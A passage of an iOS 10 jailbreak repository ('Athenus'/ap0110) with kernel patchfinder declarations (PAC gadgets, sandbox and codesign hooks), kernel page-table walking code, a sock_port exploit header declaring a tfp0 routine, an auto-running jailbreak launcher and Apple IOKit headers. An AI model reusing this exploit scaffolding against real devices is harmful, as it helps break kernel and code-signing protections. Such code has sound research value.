| uint64_t find_move_snapshot_to_purgatory(void); 75 | uint64_t find_chgproccnt(void); 76 | uint64_t find_kauth_cred_ref(void); 77 | uint64_t find_apfs_jhash_getvnode(void); 78 | uint64_t find_fs_lookup_snapshot_metadata_by_name_and_return_name(void); 79 | uint64_t find_fs_lookup_snapshot_metadata_by_name(void); 80 | uint64_t find_mount_common(void); 81 | uint64_t find_fs_snapshot(void); 82 | uint64_t find_vnode_get_snapshot(void); 83 | uint64_t find_pmap_load_trust_cache(void); 84 | uint64_t find_paciza_pointer__l2tp_domain_module_start(void); 85 | uint64_t find_paciza_pointer__l2tp_domain_module_stop(void); 86 | uint64_t find_l2tp_domain_inited(void); 87 | uint64_t find_sysctl__net_ppp_l2tp(void); 88 | uint64_t find_sysctl_unregister_oid(void); 89 | uint64_t find_mov_x0_x4__br_x5(void); 90 | uint64_t find_mov_x9_x0__br_x1(void); 91 | uint64_t find_mov_x10_x3__br_x6(void); 92 | uint64_t find_kernel_forge_pacia_gadget(void); 93 | uint64_t find_kernel_forge_pacda_gadget(void); 94 | uint64_t find_IOUserClient__vtable(void); 95 | uint64_t find_IORegistryEntry__getRegistryEntryID(void); 96 | uint64_t find_cs_blob_generation_count(void); 97 | uint64_t find_cs_find_md(void); 98 | uint64_t find_cs_validate_csblob(void); 99 | uint64_t find_kalloc_canblock(void); 100 | uint64_t find_ubc_cs_blob_allocate_site(void); 101 | uint64_t find_kfree(void); 102 | uint64_t find_hook_cred_label_update_execve(void); 103 | uint64_t find_flow_divert_connect_out(void); 104 | uint64_t find_pmap_loaded_trust_caches(void); 105 | uint64_t find_unix_syscall(void); 106 | uint64_t find_pthread_kext_register(void); 107 | uint64_t find_pthread_callbacks(void); 108 | uint64_t find_unix_syscall_return(void); 109 | uint64_t find_sysent(void); 110 | uint64_t find_syscall(int n); 111 | uint64_t find_proc_find(void); 112 | uint64_t find_proc_rele(void); 113 | // EX: find_mpo(cred_label_update_execve) 114 | #define find_mpo(name) find_mpo_entry(offsetof(struct mac_policy_ops, mpo_ ##name)) 115 | uint64_t find_mpo_entry(uint64_t offset); 116 | uint64_t find_hook_policy_syscall(int n); 117 | uint64_t find_hook_mount_check_snapshot_revert(void); 118 | uint64_t find_syscall_set_profile(void); 119 | uint64_t find_syscall_check_sandbox(void); 120 | uint64_t find_sandbox_set_container_copyin(void); 121 | uint64_t find_platform_set_container(void); 122 | uint64_t find_extension_create_file(void); 123 | uint64_t find_extension_add(void); 124 | uint64_t find_extension_release(void); 125 | uint64_t find_sfree(void); 126 | uint64_t find_sb_ustate_create(void); 127 | uint64_t find_sstrdup(void); 128 | uint64_t find_handler_map(void); 129 | uint64_t find_sandbox_handler(const char *name); 130 | uint64_t find_issue_extension_for_mach_service(void); 131 | uint64_t find_issue_extension_for_absolute_path(void); 132 | uint64_t find_copy_path_for_vp(void); 133 | uint64_t find_vn_getpath(void); 134 | uint64_t find_IOMalloc(void); 135 | uint64_t find_IOFree(void); 136 | 137 | uint64_t find_symbol(const char *symbol); 138 | 139 | #endif 140 | 141 | #endif 142 | -------------------------------------------------------------------------------- /Athenus/pte_stuff_64.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_64_h 2 | #define pte_stuff_64_h 3 | 4 | #define TTE_INDEX_SHIFT 3 5 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 6 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 7 | #define TTE_GET(tte, mask) (tte & mask) 8 | #define TTE_SETB(tte, mask) tte = tte | mask 9 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 10 | #define TTE_IS_VALID_MASK 0x1 11 | #define TTE_IS_TABLE_MASK 0x2 12 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 13 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 14 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 15 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 16 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 17 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 18 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 19 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 20 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 21 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 22 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 23 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 24 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 25 | 26 | typedef union VMA_4K { 27 | struct { 28 | uint64_t block_off : 12; 29 | uint64_t level3_index : 9; 30 | uint64_t level2_index : 9; 31 | uint64_t level1_index : 9; 32 | uint64_t level0_index : 9; 33 | uint64_t ttbr_selector : 16; 34 | } __attribute__((packed)) vm_info; 35 | uint64_t vmaddr; 36 | } VMA_4K; 37 | typedef union VMA_16K { 38 | struct { 39 | uint64_t block_off : 14; 40 | uint64_t level3_index : 11; 41 | uint64_t level2_index : 11; 42 | uint64_t level1_index : 11; 43 | uint64_t level0_index : 1; 44 | uint64_t ttbr_selector : 16; 45 | } __attribute__((packed)) vm_info; 46 | uint64_t vmaddr; 47 | } VMA_16K; 48 | 49 | VMA_16K vad16; 50 | VMA_4K vad4; 51 | char isvad = 0; 52 | 53 | #define TTELog NSLog 54 | vm_size_t sz = 0; 55 | 56 | void checkvad() { 57 | if (!sz) { 58 | struct utsname u = { 0 }; 59 | uname(&u); 60 | host_page_size(mach_host_self(), &sz); 61 | NSLog(@"checkvad: %lx %x", (uintptr_t)sz, getpagesize()); 62 | if (strstr(u.machine, "iPad5,") == u.machine) { 63 | sz = 4096; // this is 4k but host_page_size lies to us 64 | } 65 | assert(sz); 66 | if (sz == 4096) { 67 | isvad = 1; 68 | } 69 | } 70 | } 71 | void parse_block_tte(uint64_t tte) { 72 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 73 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 74 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 75 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 76 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 77 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 78 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 79 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 80 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 81 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 82 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 83 | } 84 | 85 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 86 | 87 | checkvad(); 88 | if (!table) table = level1_table; 89 | if (!level) level = 1; 90 | 91 | vm_address_t tteaddr = 0; 92 | 93 | 94 | 95 | if (sz == 4096) { 96 | VMA_4K target_addr; 97 | target_addr.vmaddr = vmaddr; 98 | 99 | if (level == 1) { 100 | target_addr.vm_info.level1_index -= 0x1c0; 101 | } 102 | 103 | switch (level) { 104 | case 0: 105 | tteaddr = table + TTE_INDEX(target_addr, level0); 106 | break; 107 | case 1: 108 | tteaddr = table + TTE_INDEX(target_addr, level1); 109 | break; 110 | 111 | case 2: 112 | tteaddr = table + TTE_INDEX(target_addr, level2); 113 | break; 114 | 115 | case 3: 116 | tteaddr = table + TTE_INDEX(target_addr, level3); 117 | break; 118 | 119 | default: 120 | break; 121 | } 122 | 123 | } else if (sz == 4096*4) { 124 | VMA_16K target_addr; 125 | target_addr.vmaddr = vmaddr; 126 | 127 | switch (level) { 128 | case 0: 129 | tteaddr = table + TTE_INDEX(target_addr, level0); 130 | break; 131 | case 1: 132 | tteaddr = table + TTE_INDEX(target_addr, level1); 133 | break; 134 | 135 | case 2: 136 | tteaddr = table + TTE_INDEX(target_addr, level2); 137 | break; 138 | 139 | case 3: 140 | tteaddr = table + TTE_INDEX(target_addr, level3); 141 | break; 142 | 143 | default: 144 | break; 145 | } 146 | 147 | 148 | } 149 | 150 | //parse_block_tte(level1_entry); 151 | 152 | pagestuff_64_callback(tteaddr, level); 153 | 154 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 155 | 156 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 157 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 158 | } 159 | } 160 | 161 | uint64_t findphys_real(uint64_t virtaddr) { 162 | __block uint64_t physvar = 0; 163 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 164 | uint64_t tte = ReadAnywhere64(tte_addr); 165 | if (addr == 3) { 166 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 167 | } 168 | }, level1_table, isvad ? 1 : 2); 169 | 170 | return physvar; 171 | 172 | } 173 | 174 | #endif 175 | 176 | -------------------------------------------------------------------------------- /Athenus/sock_port_exploit.h: -------------------------------------------------------------------------------- 1 | // 2 | // exploit.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #ifndef exploit_h 10 | #define exploit_h 11 | 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #include "exploit_utilities.h" 21 | #include "kernel_memory.h" 22 | 23 | __BEGIN_DECLS 24 | 25 | #define IPV6_USE_MIN_MTU 42 26 | #define IPV6_PKTINFO 46 27 | #define IPV6_PREFER_TEMPADDR 63 28 | 29 | struct route_in6 { 30 | struct rtentry *ro_rt; 31 | struct llentry *ro_lle; 32 | struct ifaddr *ro_srcia; 33 | uint32_t ro_flags; 34 | struct sockaddr_in6 ro_dst; 35 | }; 36 | 37 | struct ip6po_rhinfo { 38 | struct ip6_rthdr *ip6po_rhi_rthdr; /* Routing header */ 39 | struct route_in6 ip6po_rhi_route; /* Route to the 1st hop */ 40 | }; 41 | 42 | struct ip6po_nhinfo { 43 | struct sockaddr *ip6po_nhi_nexthop; 44 | struct route_in6 ip6po_nhi_route; /* Route to the nexthop */ 45 | }; 46 | 47 | struct ip6_pktopts { 48 | struct mbuf *ip6po_m; 49 | int ip6po_hlim; 50 | struct in6_pktinfo *ip6po_pktinfo; 51 | struct ip6po_nhinfo ip6po_nhinfo; 52 | struct ip6_hbh *ip6po_hbh; 53 | struct ip6_dest *ip6po_dest1; 54 | struct ip6po_rhinfo ip6po_rhinfo; 55 | struct ip6_dest *ip6po_dest2; 56 | int ip6po_tclass; 57 | int ip6po_minmtu; 58 | int ip6po_prefer_tempaddr; 59 | int ip6po_flags; 60 | }; 61 | 62 | #define IO_BITS_ACTIVE 0x80000000 63 | #define IOT_PORT 0 64 | #define IKOT_TASK 2 65 | #define IKOT_CLOCK 25 66 | #define IKOT_IOKIT_CONNECT 29 67 | 68 | typedef volatile struct { 69 | uint32_t ip_bits; 70 | uint32_t ip_references; 71 | struct { 72 | uintptr_t data; 73 | uintptr_t type; 74 | } ip_lock; // spinlock 75 | struct { 76 | struct { 77 | struct { 78 | uint32_t flags; 79 | uint32_t waitq_interlock; 80 | uint64_t waitq_set_id; 81 | uint64_t waitq_prepost_id; 82 | struct { 83 | uintptr_t next; 84 | uintptr_t prev; 85 | } waitq_queue; 86 | } waitq; 87 | uintptr_t messages; 88 | uint32_t seqno; 89 | uint32_t receiver_name; 90 | uint16_t msgcount; 91 | uint16_t qlimit; 92 | //uint32_t pad; 93 | } port; 94 | uintptr_t klist; 95 | } ip_messages; 96 | uintptr_t ip_receiver; 97 | uintptr_t ip_kobject; 98 | uintptr_t ip_nsrequest; 99 | uintptr_t ip_pdrequest; 100 | uintptr_t ip_requests; 101 | uintptr_t ip_premsg; 102 | uintptr_t ip_context; 103 | uint32_t ip_flags; 104 | uint32_t ip_mscount; 105 | uint32_t ip_srights; 106 | uint32_t ip_sorights; 107 | } kport_t; 108 | 109 | typedef struct { 110 | struct { 111 | uintptr_t data; 112 | uint32_t reserved : 24, 113 | type : 8; 114 | } lock; // mutex lock 115 | uint32_t ref_count; 116 | uint32_t active; 117 | uint32_t halting; 118 | uintptr_t map; 119 | } ktask_t; 120 | 121 | #define WQT_QUEUE 0x2 122 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7) 123 | 124 | union waitq_flags { 125 | struct { 126 | uint32_t /* flags */ 127 | waitq_type:2, /* only public field */ 128 | waitq_fifo:1, /* fifo wakeup policy? */ 129 | waitq_prepost:1, /* waitq supports prepost? */ 130 | waitq_irq:1, /* waitq requires interrupts disabled */ 131 | waitq_isvalid:1, /* waitq structure is valid */ 132 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */ 133 | waitq_eventmask:_EVENT_MASK_BITS; 134 | }; 135 | uint32_t flags; 136 | }; 137 | 138 | 139 | mach_port_t sock_port_get_tfp0(kptr_t *kbase); 140 | uintptr_t task_self_addr(void); 141 | 142 | __END_DECLS 143 | 144 | #endif /* exploit_h */ 145 | -------------------------------------------------------------------------------- /Athenus/sugondesenuts.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #ifndef sugondesenuts_h 17 | #define sugondesenuts_h 18 | 19 | // happy ld? fuck you sugondesenuts 20 | int viewDidExecute; 21 | 22 | #endif /* sugondesenuts_h */ 23 | -------------------------------------------------------------------------------- /Athenus/untethered.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #ifndef untethered_h 17 | #define untethered_h 18 | 19 | int fun(int argc, char* argv[]); 20 | 21 | #endif /* untethered_h */ 22 | -------------------------------------------------------------------------------- /Athenus/untethered.m: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #import 17 | #import 18 | #include "config.h" 19 | #include "jailbreak.h" 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #import "sugondesenuts.h" 26 | 27 | int (*dsystem)(const char *) = 0; 28 | 29 | void jelbrekme() { 30 | dispatch_async(jailbreak_queue , ^{ 31 | //sleep(2); 32 | if (viewDidExecute) 33 | return; 34 | struct utsname name; 35 | uname(&name); 36 | if (!strstr(name.version, "MarijuanARM")){ 37 | usleep(USEC_PER_SEC/100); 38 | jailbreak(); 39 | } 40 | }); 41 | } 42 | 43 | int fun(int argc, char* argv[]) { 44 | dsystem = dlsym(RTLD_DEFAULT,"system"); 45 | 46 | /* enable logging */ 47 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,NSUserDomainMask, YES); 48 | NSString *documentsDirectory = [paths objectAtIndex:0]; 49 | NSString *fileName =[NSString stringWithFormat:@"%@.txt",[NSDate date]]; 50 | NSString *logFilePath = [documentsDirectory stringByAppendingPathComponent:fileName]; 51 | freopen([logFilePath cStringUsingEncoding:NSASCIIStringEncoding],"a+",stdout); 52 | freopen([logFilePath cStringUsingEncoding:NSASCIIStringEncoding],"a+",stderr); 53 | NSLog(@"loaded"); 54 | 55 | /* do teh jelbrekz */ 56 | dispatch_async(dispatch_get_global_queue( DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^(void){ 57 | __block UIBackgroundTaskIdentifier backgroundTaskIdentifier = [[UIApplication sharedApplication] beginBackgroundTaskWithExpirationHandler:^{ 58 | 59 | [[UIApplication sharedApplication] endBackgroundTask:backgroundTaskIdentifier]; 60 | 61 | backgroundTaskIdentifier = UIBackgroundTaskInvalid; 62 | }]; 63 | if ([[NSFileManager defaultManager]fileExistsAtPath:@"/Applications/Cydia.app/"] /*&& [[NSUserDefaults standardUserDefaults] boolForKey:@"jailbreakEnabled"]*/) { 64 | printf("[*] jailbreaking...\n"); 65 | jelbrekme(); 66 | } 67 | else { 68 | printf("[*] not jailbreaking..."); 69 | } 70 | }); 71 | return 0; 72 | } 73 | -------------------------------------------------------------------------------- /IOKit.framework/Headers/IOKitKeys.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 30 | * 31 | * Common symbol definitions for IOKit. 32 | * 33 | * HISTORY 34 | * 35 | */ 36 | 37 | 38 | #ifndef _IOKIT_IOKITKEYS_H 39 | #define _IOKIT_IOKITKEYS_H 40 | 41 | // properties found in the registry root 42 | #define kIOKitBuildVersionKey "IOKitBuildVersion" 43 | #define kIOKitDiagnosticsKey "IOKitDiagnostics" 44 | // a dictionary keyed by plane name 45 | #define kIORegistryPlanesKey "IORegistryPlanes" 46 | #define kIOCatalogueKey "IOCatalogue" 47 | 48 | // registry plane names 49 | #define kIOServicePlane "IOService" 50 | #define kIOPowerPlane "IOPower" 51 | #define kIODeviceTreePlane "IODeviceTree" 52 | #define kIOAudioPlane "IOAudio" 53 | #define kIOFireWirePlane "IOFireWire" 54 | #define kIOUSBPlane "IOUSB" 55 | 56 | // registry ID number 57 | #define kIORegistryEntryIDKey "IORegistryEntryID" 58 | 59 | // IOService class name 60 | #define kIOServiceClass "IOService" 61 | 62 | // IOResources class name 63 | #define kIOResourcesClass "IOResources" 64 | 65 | // IOService driver probing property names 66 | #define kIOClassKey "IOClass" 67 | #define kIOProbeScoreKey "IOProbeScore" 68 | #define kIOKitDebugKey "IOKitDebug" 69 | 70 | // IOService matching property names 71 | #define kIOProviderClassKey "IOProviderClass" 72 | #define kIONameMatchKey "IONameMatch" 73 | #define kIOPropertyMatchKey "IOPropertyMatch" 74 | #define kIOPathMatchKey "IOPathMatch" 75 | #define kIOLocationMatchKey "IOLocationMatch" 76 | #define kIOParentMatchKey "IOParentMatch" 77 | #define kIOResourceMatchKey "IOResourceMatch" 78 | #define kIOMatchedServiceCountKey "IOMatchedServiceCountMatch" 79 | 80 | #define kIONameMatchedKey "IONameMatched" 81 | 82 | #define kIOMatchCategoryKey "IOMatchCategory" 83 | #define kIODefaultMatchCategoryKey "IODefaultMatchCategory" 84 | 85 | // IOService default user client class, for loadable user clients 86 | #define kIOUserClientClassKey "IOUserClientClass" 87 | 88 | // key to find IOMappers 89 | #define kIOMapperIDKey "IOMapperID" 90 | 91 | #define kIOUserClientCrossEndianKey "IOUserClientCrossEndian" 92 | #define kIOUserClientCrossEndianCompatibleKey "IOUserClientCrossEndianCompatible" 93 | #define kIOUserClientSharedInstanceKey "IOUserClientSharedInstance" 94 | // diagnostic string describing the creating task 95 | #define kIOUserClientCreatorKey "IOUserClientCreator" 96 | 97 | // IOService notification types 98 | #define kIOPublishNotification "IOServicePublish" 99 | #define kIOFirstPublishNotification "IOServiceFirstPublish" 100 | #define kIOMatchedNotification "IOServiceMatched" 101 | #define kIOFirstMatchNotification "IOServiceFirstMatch" 102 | #define kIOTerminatedNotification "IOServiceTerminate" 103 | 104 | // IOService interest notification types 105 | #define kIOGeneralInterest "IOGeneralInterest" 106 | #define kIOBusyInterest "IOBusyInterest" 107 | #define kIOAppPowerStateInterest "IOAppPowerStateInterest" 108 | #define kIOPriorityPowerStateInterest "IOPriorityPowerStateInterest" 109 | 110 | #define kIOPlatformDeviceMessageKey "IOPlatformDeviceMessage" 111 | 112 | // IOService interest notification types 113 | #define kIOCFPlugInTypesKey "IOCFPlugInTypes" 114 | 115 | // properties found in services that implement command pooling 116 | #define kIOCommandPoolSizeKey "IOCommandPoolSize" // (OSNumber) 117 | 118 | // properties found in services that have transfer constraints 119 | #define kIOMaximumBlockCountReadKey "IOMaximumBlockCountRead" // (OSNumber) 120 | #define kIOMaximumBlockCountWriteKey "IOMaximumBlockCountWrite" // (OSNumber) 121 | #define kIOMaximumByteCountReadKey "IOMaximumByteCountRead" // (OSNumber) 122 | #define kIOMaximumByteCountWriteKey "IOMaximumByteCountWrite" // (OSNumber) 123 | #define kIOMaximumSegmentCountReadKey "IOMaximumSegmentCountRead" // (OSNumber) 124 | #define kIOMaximumSegmentCountWriteKey "IOMaximumSegmentCountWrite" // (OSNumber) 125 | #define kIOMaximumSegmentByteCountReadKey "IOMaximumSegmentByteCountRead" // (OSNumber) 126 | #define kIOMaximumSegmentByteCountWriteKey "IOMaximumSegmentByteCountWrite" // (OSNumber) 127 | #define kIOMinimumSegmentAlignmentByteCountKey "IOMinimumSegmentAlignmentByteCount" // (OSNumber) 128 | #define kIOMaximumSegmentAddressableBitCountKey "IOMaximumSegmentAddressableBitCount" // (OSNumber) 129 | 130 | // properties found in services that wish to describe an icon 131 | // 132 | // IOIcon = 133 | // { 134 | // CFBundleIdentifier = "com.example.driver.example"; 135 | // IOBundleResourceFile = "example.icns"; 136 | // }; 137 | // 138 | // where IOBundleResourceFile is the filename of the resource 139 | 140 | #define kIOIconKey "IOIcon" // (OSDictionary) 141 | #define kIOBundleResourceFileKey "IOBundleResourceFile" // (OSString) 142 | 143 | #define kIOBusBadgeKey "IOBusBadge" // (OSDictionary) 144 | #define kIODeviceIconKey "IODeviceIcon" // (OSDictionary) 145 | 146 | // property of root that describes the machine's serial number as a string 147 | #define kIOPlatformSerialNumberKey "IOPlatformSerialNumber" // (OSString) 148 | 149 | // property of root that describes the machine's UUID as a string 150 | #define kIOPlatformUUIDKey "IOPlatformUUID" // (OSString) 151 | 152 | // IODTNVRAM property keys 153 | #define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY" 154 | #define kIODTNVRAMPanicInfoKey "aapl,panic-info" 155 | 156 | // keys for complex boot information 157 | #define kIOBootDeviceKey "IOBootDevice" // dict | array of dicts 158 | #define kIOBootDevicePathKey "IOBootDevicePath" // arch-neutral OSString 159 | #define kIOBootDeviceSizeKey "IOBootDeviceSize" // OSNumber of bytes 160 | 161 | // keys for OS Version information 162 | #define kOSBuildVersionKey "OS Build Version" 163 | 164 | #endif /* ! _IOKIT_IOKITKEYS_H */ 165 | -------------------------------------------------------------------------------- /IOKit.framework/Headers/IOReturn.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * HISTORY 30 | */ 31 | 32 | /* 33 | * Core IOReturn values. Others may be family defined. 34 | */ 35 | 36 | #ifndef __IOKIT_IORETURN_H 37 | #define __IOKIT_IORETURN_H 38 | 39 | #ifdef __cplusplus 40 | extern "C" { 41 | #endif 42 | 43 | #include 44 | 45 | typedef kern_return_t IOReturn; 46 | 47 | #ifndef sys_iokit 48 | #define sys_iokit err_system(0x38) 49 | #endif /* sys_iokit */ 50 | #define sub_iokit_common err_sub(0) 51 | #define sub_iokit_usb err_sub(1) 52 | #define sub_iokit_firewire err_sub(2) 53 | #define sub_iokit_block_storage err_sub(4) 54 | #define sub_iokit_graphics err_sub(5) 55 | #define sub_iokit_networking err_sub(6) 56 | #define sub_iokit_bluetooth err_sub(8) 57 | #define sub_iokit_pmu err_sub(9) 58 | #define sub_iokit_acpi err_sub(10) 59 | #define sub_iokit_smbus err_sub(11) 60 | #define sub_iokit_ahci err_sub(12) 61 | #define sub_iokit_powermanagement err_sub(13) 62 | //#define sub_iokit_hidsystem err_sub(14) 63 | #define sub_iokit_scsi err_sub(16) 64 | //#define sub_iokit_pccard err_sub(21) 65 | 66 | #define sub_iokit_vendor_specific err_sub(-2) 67 | #define sub_iokit_reserved err_sub(-1) 68 | 69 | #define iokit_common_err(return) (sys_iokit|sub_iokit_common|return) 70 | #define iokit_family_err(sub,return) (sys_iokit|sub|return) 71 | #define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return) 72 | 73 | #define kIOReturnSuccess KERN_SUCCESS // OK 74 | #define kIOReturnError iokit_common_err(0x2bc) // general error 75 | #define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory 76 | #define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage 77 | #define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC 78 | #define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device 79 | #define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation 80 | #define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument 81 | #define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked 82 | #define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked 83 | #define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and 84 | // device already open 85 | #define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages 86 | // had different msg_id 87 | #define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function 88 | #define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure 89 | #define kIOReturnInternalError iokit_common_err(0x2c9) // internal error 90 | #define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error 91 | //#define kIOReturn???Error iokit_common_err(0x2cb) // ??? 92 | #define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock 93 | #define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open 94 | #define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported 95 | #define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported 96 | #define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error 97 | #define 